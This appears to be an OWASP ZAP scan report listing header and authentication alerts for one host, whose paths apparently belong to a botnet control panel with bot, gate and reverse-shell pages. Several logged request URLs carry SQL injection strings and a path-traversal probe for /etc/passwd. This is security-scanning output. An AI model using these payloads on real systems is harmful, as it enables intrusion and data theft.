Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 626 bytes.
Request Body - size: 0 bytes.
Response Header - size: 241 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 152 bytes.
Request Body - size: 0 bytes.
Response Header - size: 275 bytes.
Response Body - size: 27,382 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/gate.php?bot=DESKTOP-95IQEEV
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 566 bytes.
Request Body - size: 0 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 290 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 441 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 259 bytes.
Response Body - size: 97,496 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 389 bytes.
Response Body - size: 131 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?customArgs=&dllFunction=&limit=&params=*&task_select=8&unit_EXEC=18.9
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 709 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 468 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs=
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 972 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 234 bytes.
Response Body - size: 342 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 247 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method POST
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 479 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
Instances 54
Solution
Ensure that your web server, application server, load balancer, etc. is configured to suppress the "Server" header or provide generic details.
Reference https://httpd.apache.org/docs/current/mod/core.html#servertokens
https://learn.microsoft.com/en-us/previous-versions/msp-n-p/ff648552(v=pandp.10)
https://www.troyhunt.com/shhh-dont-let-your-response-headers/
Tags OWASP_2021_A05
OWASP_2017_A06
WSTG-v42-INFO-02
CWE Id 200
WASC Id 13
Plugin Id 10036
Low
X-Content-Type-Options Header Missing
Description
The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.
URL http://142.202.242.172
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 152 bytes.
Request Body - size: 0 bytes.
Response Header - size: 275 bytes.
Response Body - size: 27,382 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 259 bytes.
Response Body - size: 97,496 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
Instances 29
Solution
Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.
Reference https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)
https://owasp.org/www-community/Security_Headers
Tags OWASP_2021_A05
OWASP_2017_A06
CWE Id 693
WASC Id 15
Plugin Id 10021
Informational
Authentication Request Identified
Description
The given request has been identified as an authentication request. The 'Other Info' field contains a set of key=value lines which identify any relevant fields. If the request is in a context which has an Authentication Method set to "Auto-Detect" then this rule will change the authentication to match the request identified.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter username
Attack
Evidence password
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter username
Attack
Evidence password
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter username
Attack
Evidence password
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter username
Attack
Evidence password
Request Header - size: 808 bytes.
Request Body - size: 113 bytes.
Response Header - size: 513 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter username
Attack
Evidence password
Request Header - size: 1,056 bytes.
Request Body - size: 154 bytes.
Response Header - size: 216 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter username
Attack
Evidence password
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
Instances 6
Solution
This is an informational alert rather than a vulnerability and so there is nothing to fix.
Reference https://www.zaproxy.org/docs/desktop/addons/authentication-helper/auth-req-id/
Tags
CWE Id
WASC Id
Plugin Id 10111
Informational
Cookie Slack Detector
Description
Repeated GET requests: drop a different cookie each time, followed by normal request with all cookies to stabilize session, compare responses against original baseline GET. This can reveal areas where cookie based authentication/attributes are not actually enforced.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 245 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter
Attack
Evidence
Request Header - size: 211 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method GET
Parameter
Attack
Evidence
Request Header - size: 694 bytes.
Request Body - size: 0 bytes.
Response Header - size: 311 bytes.
Response Body - size: 27,382 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 807 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter
Attack
Evidence
Request Header - size: 221 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter
Attack
Evidence
Request Header - size: 227 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter
Attack
Evidence
Request Header - size: 425 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter
Attack
Evidence
Request Header - size: 243 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter
Attack
Evidence
Request Header - size: 439 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence
Request Header - size: 749 bytes.
Request Body - size: 0 bytes.
Response Header - size: 255 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter
Attack
Evidence
Request Header - size: 401 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter
Attack
Evidence
Request Header - size: 664 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 97,496 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter
Attack
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter
Attack
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 704 bytes.
Request Body - size: 0 bytes.
